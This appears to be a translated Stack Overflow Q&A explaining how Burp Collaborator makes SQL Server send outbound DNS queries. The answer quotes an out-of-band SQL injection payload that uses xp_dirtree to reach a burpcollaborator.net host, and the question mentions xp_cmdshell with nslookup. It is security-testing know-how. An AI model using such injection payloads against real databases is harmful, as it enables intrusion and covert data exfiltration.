0

Burp Collaborator 如何通过 t-sql 和 Sql Server 发送 DNS 查询?

https://portswigger.net/burp/help/collaborator.html

我知道您可以使用例如exec master..xp_cmdshell 'nslookup intel.com'Dns.GetHostAddresses()在 SQL Server 2005 或 2008 上的存储过程中使用,如此处所述:https ://stackoverflow.com/a/967696/3850405

然而,今天允许的服务器并不多xp_cmdshell,这是理所当然的,但这意味着 Burp Collaborator 使用了其他东西。什么?连接只需出站,无需返回任何内容。

4

1 回答 1

0

找到答案了,exec master.dbo.xp_dirtree。样本:

;exec master.dbo.xp_dirtree
'\\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'--

http://releases.portswigger.net/2015/09/1627.html

如果您安装了 Burp Suite Professional,您可以通过 Burp -> Burp Collaborator 客户端生成一个链接,然后轮询结果。

于 2017-05-05T19:54:22.803 回答